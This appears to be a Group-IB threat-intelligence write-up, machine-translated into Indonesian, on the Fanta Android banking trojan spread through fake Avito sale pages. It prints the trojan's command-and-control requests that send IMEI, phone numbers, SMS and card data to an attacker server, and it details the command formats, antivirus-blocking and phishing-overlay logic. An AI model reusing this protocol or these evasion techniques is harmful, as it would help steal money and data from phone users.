Setelah Anda ingin menjual sesuatu di Avito dan, setelah memberikan deskripsi terperinci tentang produk Anda (misalnya, modul RAM), Anda akan mendapatkan pesan ini:
Saat Anda membuka tautan, Anda akan melihat halaman yang agak tidak berbahaya yang memberi tahu Anda, penjual yang bahagia dan sukses, tentang pembelian:
Setelah Anda mengklik tombol "Lanjutkan", file APK dengan ikon dan nama yang dapat dipercaya akan diunduh ke perangkat Android Anda. Anda menginstal aplikasi yang karena alasan tertentu meminta hak aksesibilitas layanan, kemudian beberapa jendela muncul dan dengan cepat menghilang dan ... Itu saja.
Anda masuk untuk memeriksa saldo Anda, tetapi karena suatu alasan aplikasi perbankan Anda lagi menanyakan rincian kartu Anda. Setelah memasukkan data, hal yang mengerikan terjadi: untuk beberapa alasan yang belum jelas bagi Anda, uang mulai menghilang dari akun Anda. Anda mencoba menyelesaikan masalah, tetapi telepon Anda menolak: itu menekan tombol "Kembali" dan "Rumah", tidak mematikan dan tidak memungkinkan untuk mengaktifkan perlindungan apa pun. Akibatnya, Anda dibiarkan tanpa uang, barang-barang Anda belum dibeli, Anda bingung dan bertanya-tanya: apa yang terjadi?
Jawabannya sederhana: Anda adalah korban Trojan Android Fanta, keluarga Flexnet. Bagaimana itu bisa terjadi? Kami akan jelaskan sekarang.
Penulis:
Andrey Polovinkin , Spesialis Junior dalam Analisis Kode Berbahaya,
Ivan Pisarev , Spesialis Analisis Kode Berbahaya.
Beberapa statistik
Untuk pertama kalinya, keluarga Trojan Flexnet Android dikenal kembali pada tahun 2015. Selama periode aktivitas yang cukup panjang, keluarga ini berkembang ke beberapa subspesies: Fanta, Limebot, Lipton, dll. Trojan, serta infrastruktur yang terkait dengannya, tidak diam: skema distribusi baru yang efektif sedang dikembangkan - dalam kasus kami, laman phishing berkualitas tinggi yang ditujukan untuk penjual-pengguna tertentu, dan pengembang Trojan mengikuti tren mode dalam penulisan virus - menambahkan fitur baru yang memungkinkan untuk mencuri lebih efektif uang dari perangkat yang terinfeksi dan mekanisme perlindungan bypass.
Kampanye yang dijelaskan dalam artikel ini ditujukan untuk pengguna dari Rusia, sejumlah kecil perangkat yang terinfeksi terdeteksi di Ukraina, dan bahkan lebih sedikit di Kazakhstan dan Belarus.
Terlepas dari kenyataan bahwa Flexnet telah berada di arena Trojan Android selama lebih dari 4 tahun dan telah dipelajari secara terperinci oleh banyak peneliti, Flexnet masih dalam kondisi yang baik. Mulai Januari 2019, jumlah potensi kerusakan lebih dari 35 juta rubel - dan ini hanya untuk kampanye di Rusia. Pada 2015, berbagai versi trojan Android ini dijual di forum bawah tanah, tempat kode sumber trojan dengan deskripsi terperinci juga dapat ditemukan. Dan ini berarti statistik kerusakan di dunia bahkan lebih mengesankan. Indikator yang bagus untuk orang tua seperti itu, bukan?
Dari berjualan hingga selingkuh
Seperti yang dapat Anda lihat dari tangkapan layar halaman phishing untuk layanan Internet untuk menempatkan iklan Avito yang disajikan sebelumnya, disiapkan untuk korban tertentu. Tampaknya, para penyerang menggunakan salah satu parser Avito, mengeluarkan nomor telepon dan nama penjual, serta deskripsi produk. Setelah halaman diperluas dan file APK disiapkan, pesan SMS dikirim ke korban dengan namanya dan tautan ke halaman phishing yang berisi deskripsi produknya dan jumlah yang diterima dari โpenjualanโ produk. Dengan mengklik tombol, pengguna menerima file APK berbahaya - Fanta.
Pemeriksaan domain shcet491 [.] Ru menunjukkan bahwa domain itu didelegasikan ke server DNS Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
File zona domain berisi entri yang menunjuk ke alamat IP 31.220.23 [.] 236, 31.220.23 [.] 243 dan 31.220.23 [.] 235. Namun, catatan sumber daya master domain (catatan) menunjuk ke server dengan alamat IP 178.132.1 [.] 240.
Alamat IP 178.132.1 [.] 240 terletak di Belanda dan milik WorldStream
hoster . Alamat IP 31.220.23 [.] 235, 31.220.23 [.] 236 dan 31.220.23 [.] 243 terletak di Inggris dan milik server hosting bersama HOSTINGER.
Openprov-ru digunakan sebagai registrar. Domain berikut ini juga diatasi ke alamat IP 178.132.1 [.] 240:
- sdelka-ru [.] ru
- tovar-av [.] ru
- av-tovar [.] ru
- ru-sdelka [.] ru
- shcet382 [.] ru
- sdelka221 [.] ru
- sdelka211 [.] ru
- vyplata437 [.] ru
- viplata291 [.] ru
- perevod273 [.] ru
- perevod901 [.] ru
Perlu dicatat bahwa hampir semua domain memiliki tautan dengan format berikut:
http: // (www.) {0,1} <% domain%> / [0-9] {7}Tautan dari pesan SMS juga termasuk dalam templat ini. Menurut data historis, ditemukan bahwa satu tautan terkait dengan beberapa tautan menurut templat di atas, yang menunjukkan penggunaan satu domain untuk menyebarkan trojan ke beberapa korban.
Mari kita jalankan sedikit ke depan: sebagai server kontrol, Trojan yang diunduh melalui tautan dari SMS menggunakan alamat
onuseseddohap [.] Club . Domain ini terdaftar pada 2019-03-12, dan mulai 2019-04-29, aplikasi-APK berinteraksi dengan domain ini. Berdasarkan data yang diterima dari VirusTotal, total 109 aplikasi berinteraksi dengan server ini. Domain itu sendiri diputuskan ke alamat IP
217.23.14 [.] 27 , yang terletak di Belanda dan dimiliki oleh WorldStream
hoster .
Namecheap digunakan sebagai registrar. Domain
bad-racoon [.] Club (mulai dari 2018-09-25) dan
bad-racoon [.] Live (mulai dari 2018-10-25) juga diatasi ke alamat IP ini. Lebih dari 80 file APK berinteraksi dengan
bad-racoon [.] Club domain, lebih dari 100 berinteraksi dengan
bad-racoon [.] Live domain.
Secara umum, kemajuan serangan adalah sebagai berikut:
Apa yang dimiliki Fanta di bawah tenda?
Seperti banyak trojan Android lainnya, Fanta dapat membaca dan mengirim pesan SMS, membuat permintaan USSD, menampilkan jendela sendiri di atas aplikasi (termasuk yang perbankan). Namun, gudang fungsionalitas keluarga ini tiba: Fanta mulai menggunakan Layanan
Aksesibilitas untuk berbagai tujuan: membaca isi pemberitahuan dari aplikasi lain, mencegah deteksi dan penghentian eksekusi Trojan pada perangkat yang terinfeksi, dll. Fanta bekerja di semua versi Android tidak lebih muda dari 4.4. Pada artikel ini, kita akan melihat lebih dekat pada sampel Fanta berikut:
- MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Segera setelah diluncurkan
Segera setelah peluncuran, trojan menyembunyikan ikonnya. Operasi aplikasi hanya dimungkinkan jika nama perangkat yang terinfeksi tidak ada dalam daftar:
- android_x86
- Virtualbox
- Nexus 5X (bullhead)
- Nexus 5 (pisau cukur)
Pemeriksaan ini dilakukan di layanan utama Trojan -
MainService . Pada awal pertama, parameter konfigurasi aplikasi diinisialisasi dengan nilai default (format penyimpanan data konfigurasi dan nilainya akan dibahas kemudian), serta pendaftaran perangkat yang terinfeksi baru di server manajemen. Permintaan HTTP POST akan dikirim ke server dengan jenis pesan
register_bot dan informasi tentang perangkat yang terinfeksi (versi Android, IMEI, nomor telepon, nama operator, dan kode negara operator tempat ia terdaftar). Alamat server adalah
hXXp: // onuseseddohap [.] Club / controller.php . Sebagai tanggapan, server mengirim pesan yang berisi bidang
bot_id ,
bot_pwd ,
server - aplikasi menyimpan nilai-nilai ini sebagai parameter dari server CnC. Parameter
server adalah opsional jika bidang tidak diterima: Fanta menggunakan alamat pendaftaran -
hXXp: // onuseseddohap [.] Club / controller.php . Fungsi mengubah alamat CnC dapat digunakan untuk menyelesaikan dua masalah: mendistribusikan beban secara merata antara beberapa server (dengan sejumlah besar perangkat yang terinfeksi, beban pada server web yang tidak dioptimalkan dapat tinggi), dan juga untuk menggunakan server alternatif jika terjadi kegagalan salah satu server CnC .
Jika kesalahan terjadi saat mengirim permintaan, trojan akan mengulangi proses pendaftaran setelah 20 detik.
Setelah berhasil mendaftarkan perangkat, Fanta akan menampilkan pesan berikut kepada pengguna:
Catatan penting: layanan yang disebut
Sistem Keamanan adalah nama layanan Trojan, dan setelah mengklik tombol
OK sebuah jendela terbuka dengan pengaturan Aksesibilitas perangkat yang terinfeksi, di mana pengguna harus mengeluarkan hak aksesibilitas untuk layanan jahat:
Segera setelah pengguna mengaktifkan
AccessibilityService , Fanta mendapatkan akses ke konten jendela aplikasi dan tindakan yang dilakukan di dalamnya:
Segera setelah menerima hak aksesibilitas, Trojan meminta hak administrator dan hak untuk membaca notifikasi:
Menggunakan AccessibilityService, aplikasi mensimulasikan penekanan tombol, sehingga memberikan semua hak yang diperlukan.
Fanta membuat beberapa instance database (yang akan dijelaskan nanti) yang diperlukan untuk menyimpan data konfigurasi, serta informasi tentang perangkat yang terinfeksi yang dikumpulkan selama proses. Untuk mengirim informasi yang dikumpulkan, Trojan membuat tugas berulang yang dirancang untuk menurunkan bidang dari database dan menerima perintah dari server kontrol. Interval untuk mengakses CnC diatur tergantung pada versi Android: dalam kasus 5.1, interval akan menjadi 10 detik, jika tidak 60 detik.
Untuk menerima perintah, Fanta membuat permintaan
GetTask ke server manajemen. Sebagai tanggapan, CnC dapat mengirim salah satu dari perintah berikut:
Fanta juga mengumpulkan pemberitahuan dari 70 aplikasi perbankan, sistem pembayaran cepat dan e-wallet dan menyimpannya dalam database.
Pengaturan Konfigurasi Penyimpanan
Untuk menyimpan parameter konfigurasi, Fanta menggunakan pendekatan standar untuk platform Android - File
preferensi . Pengaturan akan disimpan ke file yang disebut
pengaturan . Deskripsi parameter yang disimpan ada dalam tabel di bawah ini.
Fanta juga menggunakan file
smsManager :
Interaksi Basis Data
Dalam proses kerjanya, trojan menggunakan dua database. Basis data yang disebut
a digunakan untuk menyimpan berbagai informasi yang dikumpulkan dari telepon. Basis data kedua disebut
fanta.db dan digunakan untuk menyimpan pengaturan yang bertanggung jawab untuk membuat jendela phishing yang dirancang untuk mengumpulkan informasi tentang kartu bank.
Trojan menggunakan database untuk menyimpan informasi yang dikumpulkan dan mencatat tindakannya. Data disimpan dalam tabel
log . Untuk membuat tabel, gunakan kueri SQL berikut:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
Basis data berisi informasi berikut:
1. Masuk pada penyertaan perangkat yang terinfeksi dengan pesan
Telepon dihidupkan!2. Pemberitahuan dari aplikasi. Pesan dibentuk menurut templat berikut:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Data kartu bank dari formulir phising Trojan. Parameter
VIEW_NAME dapat menjadi salah satu daftar:
- AliExpress
- Avito
- Google play
- Lain-lain <% Nama Aplikasi%>
Pesan dicatat dalam format:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) :<%CARD_NUMBER%>; :<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Pesan SMS masuk / keluar dalam format:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] : /) <%Mobile number%>:<%SMS-text%>
5. Informasi tentang paket yang membuat kotak dialog dalam format:
(<%Package name%>)<%Package information%>
Tabel contoh
log :
Salah satu fitur Fanta adalah pengumpulan informasi kartu bank. Pengumpulan data terjadi karena penciptaan jendela phishing saat membuka aplikasi perbankan. Trojan membuat jendela phishing hanya sekali. Informasi yang ditunjukkan jendela kepada pengguna disimpan dalam tabel
pengaturan di basis data
fanta.db . Permintaan SQL berikut digunakan untuk membuat database:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Semua bidang tabel
pengaturan diinisialisasi secara default ke 1 (buat jendela phishing). Setelah pengguna memasukkan datanya, nilai akan ditetapkan ke 0. Bidang isian dari tabel
pengaturan :
- can_login - bidang bertanggung jawab untuk menampilkan formulir saat membuka aplikasi perbankan
- first_bank - tidak digunakan
- can_avito - bidang bertanggung jawab untuk menampilkan formulir saat membuka aplikasi Avito
- can_ali - bidang bertanggung jawab untuk menampilkan formulir saat membuka aplikasi Aliexpress
- can_another - bidang ini bertanggung jawab untuk menampilkan formulir saat membuka aplikasi apa pun dari daftar: Yula, Pandao, Drome Auto, Wallet. Kartu diskon dan bonus, Aviasales, Pemesanan, Trivago
- can_card - bidang bertanggung jawab untuk menampilkan formulir saat membuka Google Play
Interaksi Server Manajemen
Komunikasi jaringan dengan server manajemen terjadi melalui HTTP. Fanta menggunakan perpustakaan Retrofit yang populer untuk bekerja dengan jaringan. Permintaan dikirim ke
hXXp: // onuseseddohap [.] Club / controller.php . Alamat server dapat diubah selama pendaftaran di server. Cookie dapat berasal dari server. Fanta mengeksekusi permintaan server berikut:
- Bot terdaftar di server manajemen sekali pada awal pertama. Data berikut tentang perangkat yang terinfeksi dikirim ke server:
ยท Cookie - cookie yang diterima dari server (nilai defaultnya adalah string kosong)
ยท Mode - string konstan register_bot
Awalan - bilangan bulat konstan 2
ยท Version_sdk - dihasilkan oleh pola berikut: <% Build.MODEL%> / <% Build.VERSION.RELEASE%> (Avit)
Imei - IMEI dari perangkat yang terinfeksi
ยท Negara - kode negara tempat operator terdaftar, dalam format ISO
ยท Nomor - nomor telepon
ยท Operator - nama operator
Contoh permintaan yang dikirim ke server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
Menanggapi permintaan, server harus mengembalikan objek JSON yang berisi parameter berikut:
ยท Bot_id - pengidentifikasi perangkat yang terinfeksi. Jika bot_id bernilai 0, Fanta akan kembali menjalankan permintaan.
ยท Bot_pwd - kata sandi untuk server.
ยท Server - alamat server manajemen. Parameter opsional. Jika parameter tidak ditentukan, alamat yang disimpan dalam aplikasi akan digunakan.
Contoh objek JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Permintaan untuk menerima perintah dari server. Data berikut dikirim ke server:
ยท Cookie - menerima cookie dari server
ยท Tawaran - id perangkat yang terinfeksi yang diterima saat mengirim permintaan register_bot
ยท Pwd - kata sandi untuk server
ยท Divice_admin - bidang menentukan apakah hak administrator telah diperoleh. Jika hak administrator diperoleh, bidangnya adalah 1 , jika tidak 0
ยท Aksesibilitas - status Layanan Aksesibilitas. Jika layanan dimulai, nilainya 1 , jika tidak 0
ยท SMSManager - menunjukkan apakah trojan dihidupkan sebagai aplikasi default untuk menerima SMS
ยท Layar - menampilkan status layar. Ini akan diatur ke 1 jika layar menyala, jika tidak 0 ;
Contoh permintaan yang dikirim ke server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Bergantung pada perintah, server dapat mengembalikan objek JSON dengan parameter berbeda:
ยท Perintah Kirim pesan SMS : Parameter berisi nomor telepon, teks pesan SMS dan pengidentifikasi pesan yang akan dikirim. Pengidentifikasi digunakan saat mengirim pesan ke server dengan tipe setSmsStatus .
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
ยท Lakukan panggilan telepon atau perintah USSD : Nomor atau perintah telepon ada di badan respons.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
ยท Perintah Mengubah parameter interval .
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
ยท Command Change parameter intersep .
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
ยท Perintah Ubah field SmsManager .
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
ยท Perintah Kumpulkan pesan SMS dari perangkat yang terinfeksi .
{ "response": [ { "mode": 9 } ], "status":"ok" }
ยท Reset perintah telepon ke pengaturan pabrik :
{ "response": [ { "mode": 11 } ], "status":"ok" }
ยท Perintah Ubah parameter ReadDialog .
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Mengirim pesan dengan tipe setSmsStatus . Permintaan ini dilakukan setelah perintah Kirim SMS . Permintaannya adalah sebagai berikut:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Mengirimkan konten basis data. Untuk satu permintaan, satu saluran dikirim. Data berikut dikirim ke server:
ยท Cookie - menerima cookie dari server
ยท Mode - string konstan setSaveInboxSms
ยท Tawaran - id perangkat yang terinfeksi yang diterima saat mengirim permintaan register_bot
ยท Teks - teks dalam catatan database saat ini (bidang d dari tabel log dalam database a )
ยท Nomor - nama catatan basis data saat ini (bidang p dari tabel log dalam basis data a )
Sms_mode - nilai integer (bidang m dari log tabel di database a )
Permintaannya adalah sebagai berikut:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
Setelah berhasil mengirim ke server, baris akan dihapus dari tabel. Contoh objek JSON yang dikembalikan oleh server:
{ "response":[], "status":"ok" }
Interaksi dengan AccessibilityService
AccessibilityService diimplementasikan untuk memfasilitasi penggunaan perangkat Android oleh para penyandang cacat. Dalam kebanyakan kasus, interaksi fisik diperlukan untuk berinteraksi dengan aplikasi. AccessibilityService memungkinkan Anda membuatnya secara terprogram. Fanta menggunakan layanan ini untuk membuat jendela palsu dalam aplikasi perbankan dan mencegah pembukaan pengaturan sistem dan beberapa aplikasi.
Menggunakan fungsionalitas AccessibilityService, trojan memonitor perubahan elemen pada layar perangkat yang terinfeksi. Seperti dijelaskan sebelumnya, dalam pengaturan Fanta ada parameter yang bertanggung jawab untuk operasi logging dengan kotak dialog -
readDialog . Jika parameter ini disetel, informasi tentang nama dan deskripsi paket yang memicu acara akan ditambahkan ke database. Trojan melakukan tindakan berikut saat peristiwa dipicu:
- Mensimulasikan penekanan tombol kembali dan pulang jika:
ยท Jika pengguna ingin me-reboot perangkatnya
ยท Jika pengguna ingin menghapus aplikasi "Avito" atau mengubah hak akses
ยท Jika halaman menyebutkan aplikasi "Avito"
ยท Ketika Anda membuka aplikasi "Perlindungan Google Play"
ยท Saat membuka halaman dengan pengaturan AccessibilityService
ยท Ketika kotak dialog "Keamanan Sistem" muncul
ยท Saat membuka halaman dengan pengaturan "Draw over other app"
ยท Ketika Anda membuka halaman "Aplikasi", "Pulihkan dan atur ulang", "Atur ulang data", "Atur ulang pengaturan", "Panel pengembang", "Khusus. Peluang "," Aksesibilitas "," Hak Khusus "
ยท Jika acara itu dihasilkan oleh aplikasi tertentu.
Daftar aplikasi- android
- Tuan lite
- Tuan bersih
- Bersihkan Master untuk CPU x86
- Manajemen Izin Aplikasi Meizu
- Keamanan MIUI
- Clean Master - Antivirus & Cache dan Pembersihan Sampah
- Kontrol Orangtua dan GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Beta Keamanan Web
- Pembersih Virus, Antivirus, Pembersih (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & perlindungan gratis 2019
- Keamanan Mobile MegaFon
- AVG Protection untuk Xperia
- Keamanan Seluler
- Malwarebytes Antivirus & Perlindungan
- Antivirus di Android 2019
- Master Keamanan - Antivirus, VPN, AppLock, Booster
- AVG antivirus untuk tablet Huawei System Manager
- Aksesibilitas Samsung
- Samsung Smart Manager
- Master keamanan
- Penguat kecepatan
- Dr.Web
- Ruang Keamanan Dr.Web
- Pusat Kontrol Mobile Dr.Web
- Kehidupan Keamanan Dr.Web Space
- Pusat Kontrol Mobile Dr.Web
- Antivirus & Keamanan Seluler
- Kaspersky Internet Security: Anti-Virus dan Perlindungan
- Daya Tahan Baterai Kaspersky: Saver & Booster
- Kaspersky Endpoint Security - perlindungan dan manajemen
- AVG Antivirus gratis 2019 - Perlindungan untuk Android
- Android Antivirus
- Norton Mobile Security dan Antivirus
- Antivirus, Firewall, VPN, Keamanan Seluler
- Keamanan Seluler: Antivirus, VPN, Anti-Pencurian
- Antivirus untuk Android
- Jika izin diminta saat mengirim pesan SMS ke nomor pendek, Fanta meniru mengklik kotak centang Ingat pilihan dan tombol kirim .
- Ketika Anda mencoba untuk mengambil hak administrator dari trojan, itu mengunci layar ponsel.
- Mencegah penambahan administrator baru.
- Jika aplikasi anti-virus dr.web mendeteksi ancaman, Fanta meniru klik pada tombol abaikan .
- Trojan meniru mengklik tombol kembali dan beranda jika suatu peristiwa dihasilkan oleh aplikasi Samsung Device Care .
- Fanta menciptakan jendela phishing dengan formulir untuk memasukkan informasi tentang kartu bank jika aplikasi diluncurkan dari daftar yang mencakup sekitar 30 layanan Internet yang berbeda. Diantaranya: AliExpress, Pemesanan, Avito, Komponen Google Play Market, Pandao, Drome Auto, dll.
Formulir phishing
Fanta menganalisis aplikasi mana yang berjalan pada perangkat yang terinfeksi. Jika aplikasi yang menarik dibuka, trojan menunjukkan jendela phishing di atas semua yang lain, yang merupakan formulir untuk memasukkan informasi tentang kartu bank. Pengguna harus memasukkan data berikut:
- Nomor kartu
- Tanggal kedaluwarsa kartu
- CVV
- Nama Pemegang Kartu (tidak untuk semua bank)
Tergantung pada aplikasi yang sedang berjalan, jendela phishing yang berbeda akan ditampilkan. Berikut ini akan memberikan contoh beberapa di antaranya:
Aliexpress:
Avito:
Untuk beberapa aplikasi lain, misalnya Google Play Market, Aviasales, Pandao, Booking, Trivago:
Bagaimana sebenarnya
Untungnya, orang yang menerima pesan SMS yang dijelaskan di awal artikel ternyata adalah seorang spesialis di bidang cybersecurity. Oleh karena itu, versi yang asli, non-directorial, berbeda dari yang diceritakan sebelumnya: orang tersebut menerima SMS yang menarik, setelah itu ia memberikannya kepada tim Intelijen Perburuan Ancaman Group-IB. Hasil serangannya adalah artikel ini. Selamat berakhir, bukan? Namun, tidak semua cerita berakhir dengan baik, dan agar cerita Anda tidak terlihat seperti versi penyutradaraan dengan kehilangan uang, dalam banyak kasus cukup untuk mematuhi aturan berikut yang telah lama dijelaskan:
- jangan instal aplikasi untuk perangkat seluler dengan OS Android dari sumber apa pun selain Google Play
- saat memasang aplikasi, berikan perhatian khusus pada hak yang diminta oleh aplikasi
- perhatikan ekstensi file
- secara teratur menginstal pembaruan OS Android
- Jangan mengunjungi sumber daya yang mencurigakan dan jangan mengunduh file dari sana
- Jangan ikuti tautan yang diterima dalam pesan SMS.
Group-IB tahu segalanya tentang kejahatan dunia maya, tetapi menceritakan hal-hal yang paling menarik.
Saluran Telegram yang penuh aksi (https://t.me/Group_IB) tentang keamanan informasi, peretas dan serangan dunia maya, peretas dan perompak internet. Investigasi kejahatan dunia maya yang sensasional dengan langkah-langkah, kasus-kasus praktis menggunakan teknologi Group-IB dan, tentu saja, rekomendasi tentang bagaimana menghindari menjadi korban di Internet.
Saluran YouTube di sini
Group-IB Photowire di Instagram www.instagram.com/group_ib
Twitter berita pendek twitter.com/GroupIB
Group-IB adalah salah satu pengembang solusi terkemuka untuk mendeteksi dan mencegah serangan cyber, mendeteksi penipuan, dan melindungi kekayaan intelektual dalam jaringan yang berkantor pusat di Singapura.